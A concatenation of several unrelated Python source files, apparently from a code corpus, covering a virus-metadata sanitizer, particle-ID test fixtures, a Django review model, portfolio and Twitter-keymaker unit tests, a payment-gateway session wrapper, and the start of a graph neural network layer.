        A data frame indexed by strain name.
    database_ids_by_strain : str or Path-like or file object
        Path or file object containing the mapping of database ids for each strain name (one row per combination).
    Returns
    -------
    pandas.DataFrame :
        A filtered data frame with no duplicate records.
    """
    # Get strain names for the given metadata.
    strain_ids = set(metadata.index.values)
    # Get the mappings of database ids to strain names for the current strains.
    with open(database_ids_by_strain, "r") as fh:
        reader = csv.DictReader(fh, delimiter="\t")
        # The mapping file stores the strain name in the first column. All other
        # fields are database ids.
        strain_field = reader.fieldnames[0]
        database_id_columns = reader.fieldnames[1:]
        # Keep only records matching the current strain ids.
        # NOTE(review): if none of the current strains appear in the mapping
        # file, `mappings` is an empty frame with no columns and the
        # `duplicated` call below would raise KeyError — confirm upstream
        # guarantees at least one matching row per chunk.
        mappings = pd.DataFrame([
            row
            for row in reader
            if row[strain_field] in strain_ids
        ])
    # Check for duplicate strains in the given metadata. If there are none,
    # return the metadata as it is. If duplicates exist, filter them out.
    if any(mappings.duplicated(strain_field)):
        # Create a list of database ids of records to keep. To this end, we sort by
        # database ids in descending order such that the latest record appears
        # first, then we take the first record for each strain name.
        # NOTE(review): database ids are read as strings by csv.DictReader, so
        # "latest" here means lexicographically greatest — confirm id formats
        # sort consistently (e.g. zero-padded accessions).
        records_to_keep = mappings.sort_values(
            database_id_columns,
            ascending=False
        ).groupby(strain_field).first()
        # Select metadata corresponding to database ids to keep.
        metadata = metadata.reset_index().merge(
            records_to_keep,
            on=database_id_columns,
            validate="1:1",
        ).set_index(strain_field)
    return metadata
if __name__ == '__main__':
    # Command-line entry point: sanitize a metadata file by deduplicating
    # records, parsing GISAID location strings, stripping strain-name
    # prefixes, and renaming columns, then write the result to --output.
    parser = argparse.ArgumentParser(
        usage="Sanitize metadata from different sources, applying operations (deduplicate, parse location field, strip prefixes, and rename fields) in the same order they appear in the full help (-h).",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )
    parser.add_argument("--metadata", required=True, help="metadata to be sanitized")
    parser.add_argument("--metadata-id-columns", default=["strain", "name", "Virus name"], nargs="+", help="names of valid metadata columns containing identifier information like 'strain' or 'name'")
    parser.add_argument("--database-id-columns", default=["Accession ID", "gisaid_epi_isl", "genbank_accession"], nargs="+", help="names of metadata columns that store external database ids for each record (e.g., GISAID, GenBank, etc.) that can be used to deduplicate metadata records with the same strain names.")
    parser.add_argument("--metadata-chunk-size", type=int, default=100000, help="maximum number of metadata records to read into memory at a time. Increasing this number can speed up filtering at the cost of more memory used.")
    parser.add_argument("--error-on-duplicate-strains", action="store_true", help="exit with an error if any duplicate strains are found. By default, duplicates are resolved by preferring most recent accession id or the last record.")
    parser.add_argument("--parse-location-field", help="split the given GISAID location field on '/' and create new columns for region, country, etc. based on available data. Replaces missing geographic data with '?' values.")
    parser.add_argument("--strip-prefixes", nargs="+", help="prefixes to strip from strain names in the metadata")
    parser.add_argument("--rename-fields", nargs="+", help="rename specific fields from the string on the left of the equal sign to the string on the right (e.g., 'Virus name=strain')")
    parser.add_argument("--output", required=True, help="sanitized metadata")
    args = parser.parse_args()
    # Get user-defined metadata id columns to look for.
    metadata_id_columns = args.metadata_id_columns
    # Get user-defined database id columns to use for deduplication.
    database_id_columns = args.database_id_columns
    # If the input is a tarball, try to find a metadata file inside the archive.
    metadata_file = args.metadata
    metadata_is_temporary = False
    if ".tar" in Path(args.metadata).suffixes:
        try:
            temporary_dir, metadata_file = extract_tar_file_contents(
                args.metadata,
                "metadata"
            )
            metadata_is_temporary = True
        except FileNotFoundError as error:
            print(f"ERROR: {error}", file=sys.stderr)
            sys.exit(1)
    # In the first pass through the metadata, map strain names to database ids.
    # We will use this mapping to deduplicate records in the second pass.
    # Additionally, this pass checks for missing id columns and the presence of
    # any duplicate records, in case the user has requested an error on
    # duplicates.
    try:
        database_ids_by_strain = get_database_ids_by_strain(
            metadata_file,
            metadata_id_columns,
            database_id_columns,
            args.metadata_chunk_size,
            args.error_on_duplicate_strains,
        )
    # NOTE(review): `Exception` already subsumes `DuplicateException`, so the
    # tuple is redundant (though harmless); a plain `except Exception` would
    # behave identically.
    except (DuplicateException, Exception) as error:
        print(f"ERROR: {error}", file=sys.stderr)
        sys.exit(1)
    # Parse mapping of old column names to new.
    rename_fields = args.rename_fields if args.rename_fields else []
    new_column_names = parse_new_column_names(rename_fields)
    # In the second pass through the metadata, filter duplicate records,
    # transform records with requested sanitizer steps, and stream the output to
    # disk.
    metadata_reader = read_metadata(
        metadata_file,
        id_columns=metadata_id_columns,
        chunk_size=args.metadata_chunk_size,
    )
    # Only the first chunk written to the output emits a header row.
    emit_header = True
    with open_file(args.output, "w") as output_file_handle:
        for metadata in metadata_reader:
            if database_ids_by_strain:
                # Filter duplicates.
                metadata = filter_duplicates(
                    metadata,
                    database_ids_by_strain,
                )
            # Reset the data frame index, to make the "strain" column available
            # for transformation.
            strain_field = metadata.index.name
            metadata = metadata.reset_index()
            # Parse GISAID location field into separate fields for geographic
            # scales. Replace missing field values with "?".
            if args.parse_location_field and args.parse_location_field in metadata.columns:
                locations = pd.DataFrame(
                    (
                        parse_location_string(location, LOCATION_FIELDS)
                        for location in metadata[args.parse_location_field].values
                    )
                )
                # Combine new location columns with original metadata and drop the
                # original location column.
                metadata = pd.concat(
                    [
                        metadata,
                        locations
                    ],
                    axis=1
                ).drop(columns=[args.parse_location_field])
            # Strip prefixes from strain names.
            if args.strip_prefixes:
                metadata[strain_field] = metadata[strain_field].apply(
                    lambda strain: strip_prefixes(strain, args.strip_prefixes)
                )
            # Replace whitespaces from strain names with underscores to match GISAID's
            # convention since whitespaces are not allowed in FASTA record names.
            metadata[strain_field] = metadata[strain_field].str.replace(" ", "_")
            # Rename columns as needed, after transforming strain names. This
            # allows us to avoid keeping track of a new strain name field
            # provided by the user.
            if len(new_column_names) > 0:
                metadata = metadata.rename(columns=new_column_names)
            # Write filtered and transformed metadata to the output file.
            metadata.to_csv(
                output_file_handle,
                sep="\t",
                index=False,
                header=emit_header,
            )
            emit_header = False
    if database_ids_by_strain:
        # Delete the database/strain id mapping.
        os.unlink(database_ids_by_strain)
    # Clean up temporary directory and files that came from a tarball.
    if metadata_is_temporary:
        print(f"Cleaning up temporary files in {temporary_dir.name}", file=sys.stderr)
        temporary_dir.cleanup()
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2021, <NAME> and <NAME>.
#
# Distributed under the 3-clause BSD license, see accompanying file LICENSE
# or https://github.com/scikit-hep/particle for details.
import pytest
# Backport needed if Python 2 is used
from enum import IntEnum
class PDGIDsEnum(IntEnum):
    """Sample of PDGIDs on which to run tests."""
    # Gauge and Higgs bosons
    Gluon = 21
    Photon = 22
    Z0 = 23
    WMinus = -24
    HiggsBoson = 25
    ZPrime = 32
    # Charged leptons
    Electron = 11
    # Inside an Enum class body, names defined earlier evaluate to their raw
    # values, so antiparticles can be defined by negation of the particle.
    Positron = -Electron
    Muon = 13
    AntiMuon = -Muon
    Tau = 15
    TauPrime = 17
    # Neutrinos
    Nu_e = 12
    NuBar_tau = -16
    # Quarks
    DQuark = 1
    UQuark = 2
    SQuark = 3
    CQuark = 4
    BQuark = 5
    TQuark = 6
    BPrimeQuark = 7  # 4th generation
    TPrimeQuark = 8
    # Quarkonia
    jpsi = 443
    psi_2S = 100443
    Upsilon_1S = 553
    Upsilon_4S = 300553
    # Light hadrons
    Pi0 = 111
    PiPlus = 211
    eta = 221
    eta_prime = 331
    a_0_1450_plus = 10211
    KL = 130
    KS = 310
    KMinus = -321
    rho_770_minus = -213
    phi = 333
    omega = 223
    K1_1270_0 = 10313
    K1_1400_0 = 20313
    rho_1700_0 = 30113
    a2_1320_minus = -215
    omega_3_1670 = 227
    f_4_2300 = 9010229  # example of a not-well-known meson
    # Baryons
    Proton = 2212
    AntiNeutron = -2112
    Lambda = 3122
    Sigma0 = 3212
    SigmaPlus = 3222
    SigmaMinus = 3112
    Xi0 = 3322
    AntiXiMinus = -3312
    OmegaMinus = 3334
    # Charm hadrons
    D0 = 421
    DPlus = 411
    DsPlus = 431
    LcPlus = 4122
    # Beauty hadrons
    B0 = 511
    BPlus = 521
    Bs = 531
    BcPlus = 541
    Lb = 5122
    # Top hadrons
    T0 = 621
    LtPlus = 6122
    # Special particles
    Graviton = 39
    Reggeon = 110
    Pomeron = 990
    Odderon = 9990
    # Supersymmetric particles
    Gluino = 1000021
    Gravitino = 1000039
    STildeL = 1000003
    CTildeR = 2000004
    # R-hadrons
    RPlus_TTildeDbar = 1000612
    R0_GTildeG = 1000993
    RPlusPlus_GTildeUUU = 1092224
    # Q-balls
    QBall1 = 10000150
    QBall2 = -10000200
    # Dyons
    DyonSameMagElecChargeSign = 4110010
    DyonOppositeMagElecChargeSign = 4120010
    # Di-quarks
    DD1 = 1103
    SD0 = 3101
    # Nuclei
    HydrogenNucleus = 1000010010
    Carbon12 = 1000060120
    # Pentaquarks
    AntiUCbarCUDPentaquark = -9422144
    # example of spin 3/2 u-cbar-c-u-d pentaquark decaying to J/psi proton
    UCbarCUDPentaquark = 9422144
    # Technicolor
    Pi0TC = 3000111
    PiMinusTC = -3000211
    # Composite quarks and leptons
    UQuarkStar = 4000002
    AntiElectronStar = -4000011
    # Generator specific pseudoparticles or concepts
    AntiCHadron = -84
    # Invalid ID
    Invalid1 = 0  # illegal ID
    Invalid2 = 99999999  # general form is a 7-digit number
@pytest.fixture(scope="session")
def PDGIDs():
    """Session-scoped fixture exposing the PDGIDsEnum sample to tests."""
    return PDGIDsEnum
|
<gh_stars>1-10
from __future__ import annotations
import os
import uuid
from django.db import models
from django.utils.deconstruct import deconstructible
from django.utils.translation import gettext_lazy as _
from ggongsul.member.models import Member
from ggongsul.visitation.models import Visitation
from ggongsul.partner.models import Partner
@deconstructible
class PathAndRename:
    """Callable ``upload_to`` helper that renames uploaded files.

    Replaces the original filename with a short random hex name while
    keeping the file extension, and stores the file under ``sub_path``.
    ``@deconstructible`` makes the instance serializable for Django
    migrations.
    """

    def __init__(self, sub_path):
        # Directory (relative to the storage root) where renamed files go.
        self.path = sub_path

    def __call__(self, instance: ReviewImage, filename: str):
        # Use splitext instead of split(".")[-1] so a filename without an
        # extension does not get its entire name appended after the uid.
        ext = os.path.splitext(filename)[1].lstrip(".")  # eg: 'jpg'
        uid = uuid.uuid4().hex[:10]  # eg: '567ae32f97'
        renamed_filename = f"{uid}.{ext}" if ext else uid
        return os.path.join(self.path, renamed_filename)
class Review(models.Model):
    """A member's review of a partner, optionally linked to a visitation."""
    class RatingScore(models.IntegerChoices):
        # 1-5 star rating, rendered as star glyphs in the admin/UI.
        ONE = 1, _("⭐")
        TWO = 2, _("⭐⭐")
        THREE = 3, _("⭐⭐⭐")
        FOUR = 4, _("⭐⭐⭐⭐")
        FIVE = 5, _("⭐⭐⭐⭐⭐")
    class ReviewType(models.IntegerChoices):
        # Source of the review: in-app ("꽁술") or imported from Naver.
        GGONGSUL = 1, _("꽁술")
        NAVER = 2, _("네이버")
    type = models.PositiveSmallIntegerField(
        choices=ReviewType.choices, verbose_name=_("리뷰타입"), default=ReviewType.GGONGSUL
    )
    # SET_NULL on all relations below keeps reviews when the related
    # partner/member/visitation is deleted.
    partner = models.ForeignKey(
        Partner,
        related_name="reviews",
        null=True,
        on_delete=models.SET_NULL,
        verbose_name=_("업체"),
    )
    member = models.ForeignKey(
        Member,
        related_name="reviews",
        null=True,
        on_delete=models.SET_NULL,
        verbose_name=_("작성자"),
    )
    visitation = models.OneToOneField(
        Visitation,
        related_name="review",
        null=True,
        on_delete=models.SET_NULL,
        verbose_name=_("방문 기록"),
    )
    body = models.TextField(verbose_name=_("본문"))
    rating_score = models.PositiveSmallIntegerField(
        choices=RatingScore.choices, verbose_name=_("별점")
    )
    # Soft-delete flag plus timestamp; rows are flagged rather than removed.
    is_deleted = models.BooleanField(default=False, verbose_name=_("삭제 여부"))
    deleted_on = models.DateTimeField(null=True, blank=True, verbose_name=_("삭제 날짜"))
    created_on = models.DateTimeField(auto_now_add=True, verbose_name=_("생성 날짜"))
    updated_on = models.DateTimeField(auto_now=True, verbose_name=_("최근 정보 변경 날짜"))
    class Meta:
        verbose_name = _("리뷰")
        verbose_name_plural = _("리뷰")
    def __str__(self):
        return f"{self.member} 의 {self.partner} 업체 리뷰 {self.id}"
class ReviewImage(models.Model):
    """An image attached to a Review."""
    review = models.ForeignKey(
        Review, related_name="images", null=True, on_delete=models.SET_NULL
    )
    # NOTE(review): the leading "/" in the upload sub-path looks like an
    # absolute path; os.path.join in PathAndRename will discard anything
    # joined before it — confirm this matches the intended MEDIA layout.
    image = models.ImageField(
        upload_to=PathAndRename("/image/review/"),
        verbose_name=_("리뷰 사진"),
    )
    created_on = models.DateTimeField(auto_now_add=True, verbose_name=_("생성 날짜"))
    updated_on = models.DateTimeField(auto_now=True, verbose_name=_("최근 정보 변경 날짜"))
    class Meta:
        verbose_name = _("리뷰 이미지")
        verbose_name_plural = _("리뷰 이미지")
    def __str__(self):
        return self.image.url
|
import os
import unittest
import datetime
from unittest import mock
from bullets.portfolio.portfolio import Portfolio
from bullets.portfolio.transaction import Transaction, Status
from bullets.data_source.data_source_interface import DataSourceInterface, Resolution
from bullets.data_source.data_source_fmp import FmpDataSource
class TestPortfolio(unittest.TestCase):
    """Unit tests for Portfolio order handling.

    The first three tests mock out pricing and run offline; the remaining
    tests construct an FmpDataSource with the FMP_TOKEN environment variable
    and therefore require network access and a valid API token.
    """
    TIME = datetime.datetime(2021, 3, 10)
    # NOTE(review): mock.patch decorators are applied bottom-up, so the first
    # mock parameter actually corresponds to _get_slippage_price and the
    # second to get_price — the parameter names below are swapped. Harmless
    # here since both mocks return 1, but worth fixing for clarity.
    @mock.patch('bullets.data_source.data_source_interface.DataSourceInterface.get_price', return_value=1)
    @mock.patch('bullets.portfolio.portfolio.Portfolio._get_slippage_price', return_value=1)
    def test_buy_sell_long(self, mock_get_price, mock__get_slippage_price):
        # Buy with (almost) the whole balance, then sell everything back.
        portfolio = Portfolio(1000, DataSourceInterface(), 25, 1)
        transaction = portfolio.market_order("AAPL", 999)
        self.assertEqual(Status.SUCCESSFUL, transaction.status)
        self.assertEqual(0, portfolio.cash_balance)
        transaction = portfolio.market_order("AAPL", -999)
        self.assertEqual(Status.SUCCESSFUL, transaction.status)
        # 998 rather than 1000: transaction fees are deducted on each order.
        self.assertEqual(998, portfolio.cash_balance)
        self.assertEqual(0, len(portfolio.holdings))
        self.assertEqual(2, len(portfolio.transactions))
    @mock.patch('bullets.data_source.data_source_interface.DataSourceInterface.get_price', return_value=1)
    @mock.patch('bullets.portfolio.portfolio.Portfolio._get_slippage_price', return_value=1)
    def test_buy_sell_short(self, mock_get_price, mock__get_slippage_price):
        # Open a short position, then close it with an offsetting buy.
        portfolio = Portfolio(1000, DataSourceInterface(), 25, 1)
        transaction = portfolio.market_order("AAPL", -1000)
        self.assertEqual(Status.SUCCESSFUL, transaction.status)
        self.assertEqual(1999, portfolio.cash_balance)
        transaction = portfolio.market_order("AAPL", 1000)
        self.assertEqual(Status.SUCCESSFUL, transaction.status)
        self.assertEqual(0, len(portfolio.holdings))
        self.assertEqual(2, len(portfolio.transactions))
    @mock.patch('bullets.data_source.data_source_interface.DataSourceInterface.get_price', return_value=1)
    @mock.patch('bullets.portfolio.portfolio.Portfolio._get_slippage_price', return_value=1)
    def test_insufficient_funds(self, mock_get_price, mock__get_slippage_price):
        # Ordering more than the balance allows must fail and leave state intact.
        portfolio = Portfolio(1000, DataSourceInterface(), 25, 1)
        transaction = portfolio.market_order("AAPL", 2000)
        self.assertEqual(Status.FAILED_INSUFFICIENT_FUNDS, transaction.status)
        self.assertEqual(1000, portfolio.cash_balance)
        self.assertEqual(0, len(portfolio.holdings))
        # Failed transactions are still recorded.
        self.assertEqual(1, len(portfolio.transactions))
    def test_market_order(self):
        # Live-API test: buy at one timestamp, value the portfolio a day later.
        data_source = FmpDataSource(os.getenv("FMP_TOKEN"), Resolution.MINUTE)
        portfolio = Portfolio(1000, data_source, 25, 1)
        portfolio.timestamp = datetime.datetime(2019, 3, 12, 15, 57)
        data_source.timestamp = datetime.datetime(2019, 3, 12, 15, 57)
        portfolio.market_order('AAPL', 5)
        data_source.timestamp = datetime.datetime(2019, 3, 13, 15, 57)
        portfolio.timestamp = datetime.datetime(2019, 3, 13, 15, 57)
        self.assertEqual(1003.8499999999999, portfolio.update_and_get_balance())
    def test_buy_stop_order(self):
        # Stop order should not fill at the first timestamp, then fill later.
        data_source = FmpDataSource(os.getenv("FMP_TOKEN"), Resolution.MINUTE)
        portfolio = Portfolio(1000, data_source, 25, 1)
        data_source.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
        portfolio.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
        portfolio.buy_stop_order("AAPL", 5, 131)
        portfolio.on_resolution()
        # NOTE(review): `price` is unused in these live-API tests; it appears
        # to be a leftover from debugging.
        price = data_source.get_price('AAPL')
        self.assertEqual(1000, portfolio.update_and_get_balance())
        data_source.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
        portfolio.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
        portfolio.on_resolution()
        price = data_source.get_price('AAPL')
        self.assertEqual(999.0, portfolio.update_and_get_balance())
    def test_sell_stop_order(self):
        data_source = FmpDataSource(os.getenv("FMP_TOKEN"), Resolution.MINUTE)
        portfolio = Portfolio(1000, data_source, 25, 1)
        data_source.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
        portfolio.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
        portfolio.sell_stop_order("AAPL", 5, 131)
        portfolio.on_resolution()
        price = data_source.get_price('AAPL')
        self.assertEqual(1000, portfolio.update_and_get_balance())
        data_source.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
        portfolio.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
        portfolio.on_resolution()
        price = data_source.get_price('AAPL')
        self.assertEqual(999.0000000000001, portfolio.update_and_get_balance())
    def test_buy_limit_order(self):
        data_source = FmpDataSource(os.getenv("FMP_TOKEN"), Resolution.MINUTE)
        portfolio = Portfolio(1000, data_source, 25, 1)
        data_source.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
        portfolio.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
        portfolio.buy_limit_order("AAPL", 5, 131)
        portfolio.on_resolution()
        price = data_source.get_price('AAPL')
        self.assertEqual(1000, portfolio.update_and_get_balance())
        data_source.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
        portfolio.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
        portfolio.on_resolution()
        price = data_source.get_price('AAPL')
        self.assertEqual(999.0, portfolio.update_and_get_balance())
    def test_sell_limit_order(self):
        data_source = FmpDataSource(os.getenv("FMP_TOKEN"), Resolution.MINUTE)
        portfolio = Portfolio(1000, data_source, 25, 1)
        data_source.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
        portfolio.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
        portfolio.sell_limit_order("AAPL", 5, 131)
        portfolio.on_resolution()
        price = data_source.get_price('AAPL')
        self.assertEqual(1000, portfolio.update_and_get_balance())
        data_source.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
        portfolio.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
        portfolio.on_resolution()
        price = data_source.get_price('AAPL')
        self.assertEqual(999.0000000000001, portfolio.update_and_get_balance())
if __name__ == '__main__':
    # Allow running this test module directly with `python <file>`.
    unittest.main()
|
#!/usr/bin/env python
from typing import Dict
from decimal import Decimal
from uuid import uuid4
import requests
import json
# Internal Import
from sslcommerz_python_api.base import SSLCommerz
class SSLCSession(SSLCommerz):
    """High-level session wrapper for initializing an SSLCommerz payment.

    Accumulates the request payload via the ``set_*`` methods (all of which
    update ``self.integration_data`` on the SSLCommerz base class) and then
    posts it to the session API with :meth:`init_payment`.
    """

    def __init__(self,
                 sslc_is_sandbox: bool = True,
                 sslc_store_id: str = '',
                 sslc_store_pass: str = ''
                 ) -> None:
        """Create a payment session helper.

        Args:
            sslc_is_sandbox (bool, optional): Defines to use sandbox api or not. Defaults to True.
            sslc_store_id (str, optional): Store ID from SSLCommerz. Defaults to ''.
            sslc_store_pass (str, optional): Store Password for SSLCommerz store. Defaults to ''.
        """
        super().__init__(sslc_is_sandbox, sslc_store_id, sslc_store_pass)

    def set_urls(self,
                 success_url: str,
                 fail_url: str,
                 cancel_url: str,
                 ipn_url: str = ''
                 ) -> None:
        """Sets callback urls for IPN.

        Args:
            success_url (str): Success URL
            fail_url (str): Fail URL
            cancel_url (str): Cancel URL
            ipn_url (str, optional): IPN URL. Defaults to ''.
        """
        self.integration_data.update({
            'success_url': success_url,
            'fail_url': fail_url,
            'cancel_url': cancel_url,
            'ipn_url': ipn_url,
        })

    def set_product_integration(self,
                                total_amount: Decimal,
                                currency: str,
                                product_category: str,
                                product_name: str,
                                num_of_item: int,
                                shipping_method: str,
                                product_profile: str='None'
                                ) -> None:
        """Set product integration details.

        Also stamps the payload with the store credentials and a freshly
        generated transaction id (uuid4).

        Args:
            total_amount (Decimal): Total Amount
            currency (str): Currency
            product_category (str): Product's Category
            product_name (str): Product's Name
            num_of_item (int): Number of items
            shipping_method (str): Shipping Method
            product_profile (str, optional): Product's Description. Defaults to 'None'.
        """
        self.integration_data.update({
            'store_id': self.sslc_store_id,
            'store_passwd': self.sslc_store_pass,
            'tran_id': str(uuid4()),
            'total_amount': total_amount,
            'currency': currency,
            'product_category': product_category,
            'product_name': product_name,
            'num_of_item': num_of_item,
            'shipping_method': shipping_method,
            'product_profile': product_profile,
        })

    def set_customer_info(self,
                          name: str,
                          email: str,
                          address1: str,
                          city: str,
                          postcode: str,
                          country: str,
                          phone: str,
                          address2: str=''
                          ) -> None:
        """Set the customer's billing/contact details.

        Args:
            name (str): Customer's Name
            email (str): Customer's E-mail
            address1 (str): Address
            city (str): City
            postcode (str): Postcode
            country (str): Country
            phone (str): Phone/Mobile Number
            address2 (str, optional): Optional Address. Defaults to ''.
        """
        self.integration_data.update({
            'cus_name': name,
            'cus_email': email,
            'cus_add1': address1,
            'cus_add2': address2,
            'cus_city': city,
            'cus_postcode': postcode,
            'cus_country': country,
            'cus_phone': phone,
        })

    def set_shipping_info(self,
                          shipping_to: str,
                          address: str,
                          city: str,
                          postcode: str,
                          country: str
                          ) -> None:
        """Set the shipping address.

        Args:
            shipping_to (str): Customer's Name
            address (str): Address
            city (str): City
            postcode (str): Postcode
            country (str): Country
        """
        self.integration_data.update({
            'ship_name': shipping_to,
            'ship_add1': address,
            'ship_city': city,
            'ship_postcode': postcode,
            'ship_country': country,
        })

    def set_additional_values(self,
                              value_a: str = '',
                              value_b: str = '',
                              value_c: str = '',
                              value_d: str = ''
                              ) -> None:
        """Set free-form additional values passed through to SSLCommerz.

        Args:
            value_a (str, optional): Additional Value. Defaults to ''.
            value_b (str, optional): Additional Value. Defaults to ''.
            value_c (str, optional): Additional Value. Defaults to ''.
            value_d (str, optional): Additional Value. Defaults to ''.
        """
        self.integration_data.update({
            'value_a': value_a,
            'value_b': value_b,
            'value_c': value_c,
            'value_d': value_d,
        })

    def init_payment(self) -> Dict:
        """Initialize the payment by posting the accumulated payload.

        Returns:
            Dict: Normalized response. On success it carries ``status``,
            ``sessionkey`` and ``GatewayPageURL``; on failure (API status
            ``FAILED`` or a non-200 HTTP response) it carries ``status``
            and ``failedreason``.
        """
        post_url: str = self.sslc_session_api
        post_data: Dict = self.integration_data
        response_sslc = requests.post(post_url, post_data)
        # The HTTP-error path and the API "FAILED" path previously duplicated
        # this handling; parse once and branch on the outcome instead. Using
        # .get guards against malformed payloads that lack the expected keys.
        response_json = json.loads(response_sslc.text)
        if response_sslc.status_code == 200 and response_json.get('status') != 'FAILED':
            return {
                'status': response_json['status'],
                'sessionkey': response_json['sessionkey'],
                'GatewayPageURL': response_json['GatewayPageURL'],
            }
        return {
            'status': response_json.get('status', 'FAILED'),
            'failedreason': response_json.get('failedreason', ''),
        }
<reponame>rainbow-mind-machine/rainbow-mind-machine<gh_stars>1-10
import rainbowmindmachine as rmm
from unittest import TestCase
import logging
import os, subprocess
from .utils import captured_output
"""
Test Keymaker classes
"""
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
logging.getLogger('').addHandler(console)
thisdir = os.path.abspath(os.path.dirname(__file__))
class TestKeymaker(TestCase):
    """
    Test the Keymaker class.
    This focuses on testing the constructors
    and the API key initialization process.
    """
    @classmethod
    def setUpClass(self):
        # Shared fixture paths: output directory for generated keys and a
        # fake application API-key JSON file.
        self.keys_dir = os.path.join( thisdir, "test_keymaker_keys" )
        self.api_keys = os.path.join( thisdir, "apikeys_fake.json" )
        # Note: this gives the same outcome as
        # hard-coding the path "tests"
    def test_default_keymaker_apikeys_env(self):
        """
        Test ability to create single key using consumer token from environment vars
        """
        keymaker = rmm.TwitterKeymaker()
        # Set application API keys
        os.environ['CONSUMER_TOKEN'] = 'AAAAA'
        os.environ['CONSUMER_TOKEN_SECRET'] = 'BBBBB'
        keymaker.set_apikeys_env()
        # Create bot API keys
        with captured_output() as (out, err):
            keymaker.make_a_key(
                    name = 'test_default_keymaker_apikeys_env',
                    json_target = 'test_default_keymaker_apikeys_env.json',
                    keys_out_dir = self.keys_dir,
                    interactive = False
            )
        # Clean up
        # NOTE(review): this sets the env vars to empty strings rather than
        # removing them (os.environ cannot hold None); other tests that check
        # for presence of these vars may still see them defined.
        os.environ['CONSUMER_TOKEN'] = ''
        os.environ['CONSUMER_TOKEN_SECRET'] = ''
        # Assert
        output = out.getvalue().strip()
        self.assertIn('Creating fake Twitter key', output)
    def test_default_keymaker_apikeys_file(self):
        """
        Test ability to create single key using consumer token/secret from JSON file
        """
        keymaker = rmm.TwitterKeymaker()
        # Set application API keys
        keymaker.set_apikeys_file(self.api_keys)
        # Create bot API keys
        with captured_output() as (out, err):
            keymaker.make_a_key(
                    name = 'test_default_keymaker_apikeys_file',
                    json_target = 'test_default_keymaker_apikeys_file.json',
                    keys_out_dir=self.keys_dir,
                    interactive=False
            )
        # Assert
        output = out.getvalue().strip()
        self.assertIn('Creating fake Twitter key', output)
    def test_default_keymaker_apikeys_dict(self):
        """
        Test ability to create single key using consumer token/secret from dictionary
        """
        keymaker = rmm.TwitterKeymaker()
        # Set application API keys
        keymaker.set_apikeys_dict({
            'consumer_token': 'AAAAA',
            'consumer_token_secret': 'BBBBB'
        })
        # Create bot API keys
        with captured_output() as (out, err):
            keymaker.make_a_key(
                    name = 'test_default_keymaker_apikeys_dict',
                    json_target = 'test_default_keymaker_apikeys_dict.json',
                    keys_out_dir = self.keys_dir,
                    interactive = False
            )
        # Assert
        output = out.getvalue().strip()
        self.assertIn('Creating fake Twitter key', output)
    @classmethod
    def tearDownClass(self):
        # Remove the keys directory we created
        subprocess.call(['rm','-rf',self.keys_dir])
class TestFilesKeymaker(TestCase):
    """
    Test file-based keymaker classes.
    """
    @classmethod
    def setUpClass(self):
        # Shared fixture paths: output directory for generated keys and a
        # fake application API-key JSON file.
        self.keys_dir = os.path.join( thisdir, "test_keymaker_files_keys" )
        self.api_keys = os.path.join( thisdir, "apikeys_fake.json" )
    def test_files_keymaker(self):
        """
        Test the FilesKeymaker, which makes one key
        for each file with a given extension
        in a given directory.
        """
        keymaker = rmm.FilesKeymaker()
        # Set application API keys
        keymaker.set_apikeys_file(self.api_keys)
        # Create bot API keys
        # from files in filesdir
        filesdir = os.path.join(thisdir,'files/')
        with captured_output() as (out, err):
            keymaker.make_keys(
                    filesdir,
                    keys_out_dir = self.keys_dir,
                    interactive = False
            )
        # Assert
        output = out.getvalue().strip()
        self.assertIn('Creating fake Twitter key', output)
    def test_txt_keymaker(self):
        """
        Test the TxtKeymaker, which makes one key
        for each .txt file in a given directory.
        """
        keymaker = rmm.TxtKeymaker()
        # Set application API keys
        keymaker.set_apikeys_file(self.api_keys)
        # Create bot API keys
        txtdir = os.path.join(thisdir,'txt/')
        with captured_output() as (out, err):
            keymaker.make_keys(
                    txtdir,
                    keys_out_dir = self.keys_dir,
                    interactive = False
            )
        # Assert
        output = out.getvalue().strip()
        self.assertIn('Creating fake Twitter key', output)
    @classmethod
    def tearDownClass(self):
        # Remove the keys directory we created
        subprocess.call(['rm','-rf',self.keys_dir])
|
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from torch.nn import init
import dgl.function as fn
# Sends a message of node feature h
# Equivalent to => return {'m': edges.src['h']}
# randwalk_msg = fn.copy_src(src='h', out='m')
# def randwalk_reduce(nodes):
# accum = torch.mean(nodes.mailbox['m'], 1)
# return {'h': accum}
def sym_normalized_msg(edges):
    """Message function: emit each source feature divided by the product of
    the precomputed 'out_deg' (source) and 'in_deg' (destination) normalizers.
    """
    src_feature = edges.src['h']
    norm = edges.src['out_deg'] * edges.dst['in_deg']
    return {'m': src_feature / norm}
def sym_normalized_reduce(nodes):
    """Reduce function: sum incoming messages along the mailbox dimension."""
    messages = nodes.mailbox['m']
    return {'h': messages.sum(dim=1)}
'''
Formulation:
A^2XW_2 + AXW_1 + IXW_0
'''
class SoGCNLayer(nn.Module):
    """Second-order (order-k) GCN layer.

    Implements the sum A^k X W_k + ... + A X W_1 + I X W_0 where A is the
    symmetrically normalized adjacency (via the message/reduce functions
    above), using one linear map per propagation order.
    """
    def __init__(self, in_dim, out_dim, activation, dropout, batch_norm, residual=False, order=2):
        super().__init__()
        self.in_channels = in_dim
        self.out_channels = out_dim
        self.batch_norm = batch_norm
        self.residual = residual
        self.max_order = order
        # Residual connections require matching input/output widths.
        if in_dim != out_dim:
            self.residual = False
        # One linear map per order 0..order; bias is shared and added once
        # after aggregation (so each W_i stays bias-free).
